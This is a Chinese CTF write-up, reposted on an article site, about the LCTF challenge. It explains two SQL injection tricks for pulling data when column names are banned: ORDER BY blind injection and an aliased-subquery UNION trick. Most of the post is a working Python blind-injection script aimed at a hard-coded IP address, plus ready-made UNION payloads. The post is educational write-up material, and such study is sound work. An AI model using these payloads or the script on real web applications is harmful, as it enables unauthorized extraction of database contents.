美文网首页七星网络安全
列名被禁用时注入出数据的两个tricks

列名被禁用时注入出数据的两个tricks

作者: rivir | 来源:发表于2017-12-02 13:13 被阅读31次

    在LCTF 上的一道他们有什么秘密呢, 自己没有做出来,但看了大佬们的wp后颇有收获,自己总结汇总下大佬们的思路,以供参考

    该题有很多坑点,报错注入出表名,列名这部分暂且不说,也算是一个很好的知识点,这里总结下在列名被禁用的情况下如何注入出数据的两个tricks

    1. order by 盲注

    payload:

    union select 1,2,3,0x{} order by 4%23

    0x{}是我们的payload, 原理是利用order by 让第四个列的值和我们的payload进行字符比较来盲注,脚本如下:

    #!/usr/bin/env python
#coding:utf-8
import requests
import urllib

url = "http://182.254.246.93/entrance.php"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'}
#hex_s = '  !"#$%&`()*+,-./0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}~'
hex_s = ["20","21","22","23","24","25","26","27","28","29","2A","2B","2C","2D","2E","2F","30","31","32","33","34","35","36","37","38","39","3A","3B","3C","3C","3D","3E","3F","40","41","42","43","44","45","46","47","48","49","4A","4B","4C","4D","4E","4F","50","51","52","53","54","55","56","57","58","59","5A","5B","5C","5D","5E","5F","60","61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","7B","7D","7E","7F"]
old_char = ''
payload = "3 union select 1,2,3,binary(0x{}) order by 4"

def access(p):
    param = payload.format(old_char+p)
    data = {
        'pro_id':urllib.unquote(param)
    }
    res = requests.post(url,data=data).content
    # print param
    # print data
    # print res
    if ':2' in res:  
        return True
    else:
        return False
    

def erfen():
    global old_char
    for y in hex_s:
        l = 0
        r = len(hex_s)
        while l<r:
            mid = (l+r)/2
            if access(hex_s[mid]): # 
                l = mid+1
            else:
                r = mid
        old_char += hex_s[l-1]
        #print l
        if l > 94:
            return old_char[:-2].decode('hex')
            break
        print 'data => ',old_char.decode('hex')

if __name__ == '__main__':
    s = erfen()
    print 'flag:',s[:-1]+chr(ord(s[-1])+1)

    2 子查询

    payload:

    pro_id=-1 union select 1,(select e.4 from (select * from (select 1,2,3,4)c union select * from product_2017ctf limit 1 offset 3)e),3,4

    (select e.4 from (select * from (select 1,2,3,4)c union select * from product_2017ctf limit 1 offset 3)e) //e.1,e.2,e.3分别可以查询出第一列,第二列,第三列的数据

    查询出来后,我们就可以把我们查询的数据利用union联合查询插入到显位上去, 这种方法虽然简便,但其实很容易被ban, 本题的waf只是比较少的关键字,因此可以用这种方法注入出数据

    相关文章

      网友评论

        本文标题:列名被禁用时注入出数据的两个tricks

        本文链接:https://www.haomeiwen.com/subject/nsdnbxtx.html

        延伸阅读

        深度阅读

        • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

        栏目导航

        热点阅读

        七星网络安全

        关于我们|服务条款|联系我们|列名被禁用时注入出数据的两个tricks|投稿指南|网站地图|RSS订阅|排版工具|手机版

        提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

        Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

        备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

        本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

        所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!